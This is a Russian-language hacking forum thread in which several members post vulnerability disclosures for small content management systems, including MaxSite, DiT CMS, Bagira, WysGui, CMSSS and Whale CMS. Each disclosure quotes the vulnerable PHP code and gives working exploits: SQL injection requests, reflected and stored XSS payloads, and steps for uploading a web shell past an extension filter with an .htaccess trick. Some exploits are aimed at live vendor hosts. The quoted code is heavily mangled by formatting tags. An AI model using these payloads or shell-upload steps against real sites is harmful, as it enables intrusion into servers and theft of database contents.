HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 11.04.2014, 17:04
YaBtr
Guest
Сообщений: n/a
Провел на форуме:
132418

Репутация: 652
По умолчанию

CMS MaxSite


Version 0.862 - последняя версия!


Официальный сайт http://www.max-3000.com


passive XSS (reflected) в заголовке Referer

Уязвимости на странице с формой регистрации и странице авторизации.

Вектор проведения атаки идентичен, поэтому рассмотрю только страницу авторизации.

127.0.0.1/MaxSite/application/maxsite/templates/default/components/_login/_login.php

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][COLOR="#0000BB"]config[/COLOR][COLOR="#DD0000"]['site_url'] . 'login"[/COLOR][COLOR="#0000BB"]name[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"flogin"[/COLOR][COLOR="#007700"]>

[/COLOR][COLOR="#0000BB"]config[/COLOR][COLOR="#DD0000"]['
site_url'] . mso_current_url() . '"[/COLOR][COLOR="#0000BB"]name[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"flogin_redirect"[/COLOR][COLOR="#007700"]>

[/COLOR][COLOR="#0000BB"]data[/COLOR][COLOR="#DD0000"]['session']['session_id'] . '"[/COLOR][COLOR="#0000BB"]name[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"flogin_session_id"[/COLOR][COLOR="#007700"]>[/COLOR][/COLOR] 
Exploit:

Цитата:
Сообщение от None  
GET /loginform/ HTTP/1.1
Host: max-3000.com
User-Agent: Mozilla
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer
:
http://www.google.com/search?hl=en&q=">alert(1)
Cookie: ci_session=
Connection: close
 
Ответить с цитированием

  #2  
Старый 29.04.2014, 09:48
YaBtr
Guest
Сообщений: n/a
Провел на форуме:
132418

Репутация: 652
По умолчанию

DiT CMS

Версия 2.1.2 (последняя!)


Официальный сайт http://dit-cms.ru

SQL Injection

Уязвимый сценарий: search.php

Уязвимый параметр: dit_search_string_content

Вектор: error-based

Уязвимый код:

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if ([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"dit_search_string_content"[/COLOR][COLOR="#007700"]] !=[/COLOR][COLOR="#0000BB"]NULL[/COLOR][COLOR="#007700"])

{

[/
COLOR][COLOR="#0000BB"]$search[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"dit_search_string_content"[/COLOR][COLOR="#007700"]];



[/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"SELECT * FROM "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]db_prefix[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"_part WHERE header_"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]lang_system[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]" LIKE '%[/COLOR][COLOR="#007700"]{[/COLOR][COLOR="#0000BB"]$search[/COLOR][COLOR="#007700"]}[/COLOR][COLOR="#DD0000"]%' OR desc_"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]lang_system[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]" LIKE '%[/COLOR][COLOR="#007700"]{[/COLOR][COLOR="#0000BB"]$search[/COLOR][COLOR="#007700"]}[/COLOR][COLOR="#DD0000"]%' "[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$data[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]) or die ([/COLOR][COLOR="#0000BB"]mysql_error[/COLOR][COLOR="#007700"]());

[/
COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"]= array();[/COLOR][/COLOR
Exploit:

Цитата:
Сообщение от None  
POST / HTTP/1.1
Host: dit-cms.ru
...
dit_search_string_content=
'and(extractvalue(1,concat(0x3a,version())))and'
&dit_button_search.x=0&dit_button_search.y=0


passive XSS (reflected)
в том же параметре

Exploit:

Цитата:
Сообщение от None  
POST / HTTP/1.1
Host: dit-cms.ru
...
dit_search_string_content=
alert('Antichat')
&dit_button_search.x=0&dit_button_search.y=0
 
Ответить с цитированием

  #3  
Старый 12.05.2014, 16:17
YaBtr
Guest
Сообщений: n/a
Провел на форуме:
132418

Репутация: 652
По умолчанию

ECShop V2.7.3

Официальный сайт http://ecshop.com (разработана в Поднебесной)

Исследовал на демо-версии.

passive XSS (reflected) в Referer

Отправляем пакет:

Цитата:
Сообщение от None  
GET /user.php HTTP/1.1
Host: ecshop-273-1106.chinascript.ru
User-Agent: Mozilla
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer:
">alert('Antichat')
Connection: keep-alive
 
Ответить с цитированием

  #4  
Старый 16.05.2014, 16:44
YaBtr
Guest
Сообщений: n/a
Провел на форуме:
132418

Репутация: 652
По умолчанию

CMS Bagira

Версия 1.1.7b (последняя)

Официальный сайт http://bagira-cms.ru/



SQL Injection


Уязвимый сценарий: ormPage.php

Уязвимый параметр: pseudo_url

Зависимости: mq=off

Вектор: error-based

Уязвимый код:

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if ([/COLOR][COLOR="#0000BB"]$pseudo_url[/COLOR][COLOR="#007700"]!==[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"]) {

[/
COLOR][COLOR="#0000BB"]$parent_id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]getParentId[/COLOR][COLOR="#007700"]();

[/
COLOR][COLOR="#0000BB"]$s[/COLOR][COLOR="#007700"]= (empty([/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]id[/COLOR][COLOR="#007700"])) ?[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#DD0000"]'p_obj_id <> "'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]id[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'" and '[/COLOR][COLOR="#007700"];

[/
COLOR][COLOR="#0000BB"]$s[/COLOR][COLOR="#007700"].= (empty([/COLOR][COLOR="#0000BB"]$parent_id[/COLOR][COLOR="#007700"])) ?[/COLOR][COLOR="#DD0000"]'r_parent_id is NULL'[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#DD0000"]'r_parent_id = "'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$parent_id[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'"'[/COLOR][COLOR="#007700"];

[/
COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'SELECT count(p_obj_id) FROM >, >, >

WHERE pseudo_url = "'
[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$pseudo_url[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'" and

lang_id = "'
[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]languages[/COLOR][COLOR="#007700"]::[/COLOR][COLOR="#0000BB"]curId[/COLOR][COLOR="#007700"]().[/COLOR][COLOR="#DD0000"]'" and

domain_id = "'
[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]domains[/COLOR][COLOR="#007700"]::[/COLOR][COLOR="#0000BB"]curId[/COLOR][COLOR="#007700"]().[/COLOR][COLOR="#DD0000"]'" and

r_children_id = p_obj_id and '
[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$s[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]' and

o_id = p_obj_id and

o_to_trash = 0;'
[/COLOR][COLOR="#007700"];

[/
COLOR][COLOR="#0000BB"]$count[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]db[/COLOR][COLOR="#007700"]::[/COLOR][COLOR="#0000BB"]q[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]value[/COLOR][COLOR="#007700"]);[/COLOR][/COLOR
Exploit:

Цитата:
Сообщение от None  
GET /BagiraCMS/article
"*(UPDATEXML(1,concat(0x3a,(SELECT version())),4))*"
HTTP/1.1
Host: 127.0.0.1
...
passive XSS(reflected) в строке поиска:

Exploit:

Цитата:
Сообщение от None  
POST /BagiraCMS/search HTTP/1.1
Host: 127.0.0.1
...
words=
">alert(1)
 
Ответить с цитированием

  #5  
Старый 23.05.2014, 12:32
YaBtr
Guest
Сообщений: n/a
Провел на форуме:
132418

Репутация: 652
По умолчанию

CMS ModX Revolution 2.2.14-pl

ничего критичного,passive XSS (reflected) на modx.ru

PoC:

Цитата:
Сообщение от None  
modx.ru/katalog-sajtov-na-modx/top/?site_version=1&get=top&root=5
";alert('Antichat')//
&site_year=2014&site_sphere=99&filter=
 
Ответить с цитированием

  #6  
Старый 30.05.2014, 17:10
YaBtr
Guest
Сообщений: n/a
Провел на форуме:
132418

Репутация: 652
По умолчанию

CMS WysGui 2.3

Официальный сайт http://wysgui.com

SQL Injection

Уязвимый сценарий: pageData.php

Зависимости: mq=off

Вектор: error-based

Уязвимый код:

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]...

[/
COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]connect[/COLOR][COLOR="#007700"]();

[/
COLOR][COLOR="#0000BB"]$select[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'SELECT * FROM pagedata WHERE pageURL = "'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]url[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'" LIMIT 1'[/COLOR][COLOR="#007700"];

[/
COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$select[/COLOR][COLOR="#007700"]) or die([/COLOR][COLOR="#0000BB"]mysql_error[/COLOR][COLOR="#007700"]());

...[/
COLOR][/COLOR
Exploit:

Цитата:
Сообщение от None  
GET /WysGui/index.php/
"*(SELECT 1 from information_schema.tables group by concat((SELECT version()),floor(rand(0)*2)) having min(0))*"
HTTP/1.1
Host: 127.0.0.1
...
 
Ответить с цитированием

  #7  
Старый 09.06.2014, 18:39
YaBtr
Guest
Сообщений: n/a
Провел на форуме:
132418

Репутация: 652
По умолчанию

cms CMSSS 1.8 (с названием не заморачивались )

Официальный сайт http://cmsss.all4all.cz

Демо-версия http://cms.all4all.cz

SQL Injection

Уязвимый сценарий: modules/pol/index.php

Зависимости: mq=off

Вектор: union-query

Уязвимый код:

[PHP]
PHP:
PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]$topic<font color="#000000"><font color="#007700">...

</
font><font color="#0000BB">$result</font><font color="#007700">=</font><font color="#0000BB">$db</font><font color="#007700">-></font><font color="#0000BB">query</font><font color="#007700">(</font><font color="#DD0000">"SELECT * FROM cmsss_poll_polls"</font><font color="#007700">);

while(</font><font color="#0000BB">$row</font><font color="#007700">=</font><font color="#0000BB">$db</font><font color="#007700">-></font><font color="#0000BB">fetch_array</font><font color="#007700">(</font><font color="#0000BB">$result</font><font color="#007700">)) {

</
font><font color="#0000BB">$row_votes</font><font color="#007700">=</font><font color="#0000BB">$db</font><font color="#007700">-></font><font color="#0000BB">fetch_row</font><font color="#007700">(</font><font color="#DD0000">"SELECT * FROM cmsss_poll_votes WHERE poll_id   = '"</font><font color="#007700">.</font><font color="#0000BB">$row</font><font color="#007700">[</font><font color="#DD0000">'id'</font><font color="#007700">] .</font><font color="#DD0000">"'"</font><font color="#007700">);

for(</font><font color="#0000BB">$x</font><font color="#007700">=</font><font color="#0000BB">0</font><font color="#007700">;</font><font color="#0000BB">$x</font><font color="#007700">alert(1)</font>, который с радостью записывается в БД:

</
font>[COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'topic'[/COLOR][COLOR="#007700"]];

[/
COLOR][COLOR="#0000BB"]$detail[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'detail'[/COLOR][COLOR="#007700"]];

[/
COLOR][COLOR="#0000BB"]$name[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'name'[/COLOR][COLOR="#007700"]];

[/
COLOR][COLOR="#0000BB"]$email[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'email'[/COLOR][COLOR="#007700"]];

[/
COLOR][COLOR="#0000BB"]$kontrola[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'kontrola'[/COLOR][COLOR="#007700"]];

[/
COLOR][COLOR="#0000BB"]$datetime[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]date[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"d.m.y H:i:s"[/COLOR][COLOR="#007700"]);[/COLOR][COLOR="#FF8000"]//create date time

[/COLOR][COLOR="#007700"]if([/COLOR][COLOR="#0000BB"]$kontrola[/COLOR][COLOR="#007700"]!=[/COLOR][COLOR="#DD0000"]"ano"[/COLOR][COLOR="#007700"]) {

[/
COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"INSERT INTO[/COLOR][COLOR="#0000BB"]$tbl_name[/COLOR][COLOR="#DD0000"](topic, detail, name, email, datetime)VALUES('[/COLOR][COLOR="#0000BB"]$topic[/COLOR][COLOR="#DD0000"]', '[/COLOR][COLOR="#0000BB"]$detail[/COLOR][COLOR="#DD0000"]', '[/COLOR][COLOR="#0000BB"]$name[/COLOR][COLOR="#DD0000"]', '[/COLOR][COLOR="#0000BB"]$email[/COLOR][COLOR="#DD0000"]', '[/COLOR][COLOR="#0000BB"]$datetime[/COLOR][COLOR="#DD0000"]')"[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]);[/COLOR][/COLOR
Соответственно, пользователь, решившый посмотреть топик, получит себе, как минимум alert.

Вы правильно заметили, что тут еще можно провести sql injection, но 2-х инъекций, описанных выше, пока достаточно.

reflected XSS

В данном движке огромное количество reflected XSS(пассивок), искать долго не нужно, например тот же параметр id из 2-ой описанной sql-инъекции.

PHP код:
PHP:
[
COLOR="#000000"][/COLOR]"> 
[/COLOR]
PHP код:
 
PoC:

Цитата:
Сообщение от None  
http://site.com/modules/forum/view_topic.php?id=
">alert(1)
Ну и Shell Upload

Зависимости: права администратора

1.Administration module==> Downloads==> File Create ==> Профит

Создаем файл с shell.php, вписываем мини-шелл, обращаемся, соответственно: site.com/modules/download/soubor/shell.php?=phpinfo();

2. Напрямую грузим файл через форму Upload.

Мега-функция проверяет наше расширение:

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]function[/COLOR][COLOR="#0000BB"]is_script[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$filename[/COLOR][COLOR="#007700"]) {

return[/COLOR][COLOR="#0000BB"]ereg[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'\.php$|\.php3$|\.php4$|\.php5$'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$filename[/COLOR][COLOR="#007700"]);[/COLOR][/COLOR
Обход стандартный: грузим .htaccess с нужным AddType или AddHandler, ну, а потом наш файл, например shell.phtml
 
Ответить с цитированием

  #8  
Старый 18.11.2014, 23:17
Br@!ns
Guest
Сообщений: n/a
Провел на форуме:
179197

Репутация: 25
По умолчанию

Заливка шелла в magento:

1. через site.com/downloader устанавливаем модуль File System ( http://www.magentocommerce.com/magento-connect/file-system.html )

2. заливаем шелл изменяя ненужный файл
 
Ответить с цитированием

  #9  
Старый 23.03.2015, 17:45
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию

CMS: Whale CMS 1.0

Сайт: https://www.whale-cms.de

Админ панель: /backend/

Логин/пароль администратора: SELECT name, passwort from [PREFIX]_users;

SQL Injection и Reflected XSS:

Зависимости: MQ = OFF

/sys/template/include/suchen.php

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]...

[/
COLOR][COLOR="#0000BB"]$newssuche[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'newssuche'[/COLOR][COLOR="#007700"]];

echo[/COLOR][COLOR="#DD0000"]"Du hast nach dem Beitragtitel: \"[/COLOR][COLOR="#0000BB"]$newssuche[/COLOR][COLOR="#DD0000"]\" gesucht. Dadurch wurden folgende Einträge gefunden:

"[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$newssuche_abfrage[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT * FROM "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$prefix[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"news WHERE titel LIKE '%"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$newssuche[/COLOR][COLOR="#007700"]%.[/COLOR][COLOR="#DD0000"]"%' ORDER BY id DESC LIMIT 5"[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$newssuche_ergebnis[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$newssuche_abfrage[/COLOR][COLOR="#007700"]) or die([/COLOR][COLOR="#0000BB"]mysql_error[/COLOR][COLOR="#007700"]());

...[/COLOR][/COLOR
Эксплоит:

Код:
Code:
POST /?page=Home&action=suchen HTTP/1.1
Host: localhost
Connection: keep-alive
Content-Length: 85
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: localhost
User-Agent: '
Content-Type: application/x-www-form-urlencoded
Referer: http://localhost/?page=Home
Accept-Encoding: gzip, deflate
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.6,en;q=0.4
Cookie: PHPSESSID=nk29sp2qp46mudr0594bksmb14

newssuche=' union select 1,2,3,4,version(),6,7,8,9,10,11--
Stored XSS и Error-Based SQL Injection:

/sys/template/include/newscontent.php

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'action'[/COLOR][COLOR="#007700"]] ==[/COLOR][COLOR="#DD0000"]"neueskommentarposten"[/COLOR][COLOR="#007700"])

{

[/COLOR][COLOR="#0000BB"]$newskommitext[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'kommentartext'[/COLOR][COLOR="#007700"]];

[/
COLOR][COLOR="#0000BB"]$newskommiautor[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'kommentarautor'[/COLOR][COLOR="#007700"]];

...

[/
COLOR][COLOR="#0000BB"]$qu8[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"INSERT INTO "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$prefix[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"newskommentar (text, autor, datum, newsID) VALUES ('"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$newskommitext[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"','"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$newskommiautor[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"', '"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$newskommidatum[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"', '"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$newskomminewsID[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"')"[/COLOR][COLOR="#007700"]);

if
([/COLOR][COLOR="#0000BB"]$qu8[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#0000BB"]true[/COLOR][COLOR="#007700"])

{

...

}

else

{

echo[/COLOR][COLOR="#0000BB"]mysql_error[/COLOR][COLOR="#007700"]();

}[/COLOR][/COLOR
Эксплоит:

Код:
Code:
POST /?page=News&id=35&action=neueskommentarposten HTTP/1.1
Host: localhost
Connection: keep-alive
Content-Length: 65
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: localhost
User-Agent: '
Content-Type: application/x-www-form-urlencoded
Referer: http://localhost/?page=News&id=35
Accept-Encoding: gzip, deflate
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.6,en;q=0.4
Cookie: PHPSESSID=nk29sp2qp46mudr0594bksmb14

kommentarautor=">alert(/XSS/)&kommentartext=test
 
Ответить с цитированием

  #10  
Старый 08.12.2017, 18:51
grimnir
Guest
Сообщений: n/a
Провел на форуме:
216062

Репутация: 231
По умолчанию

 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Библиотека SladerNon Болталка 17 05.02.2007 23:30



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ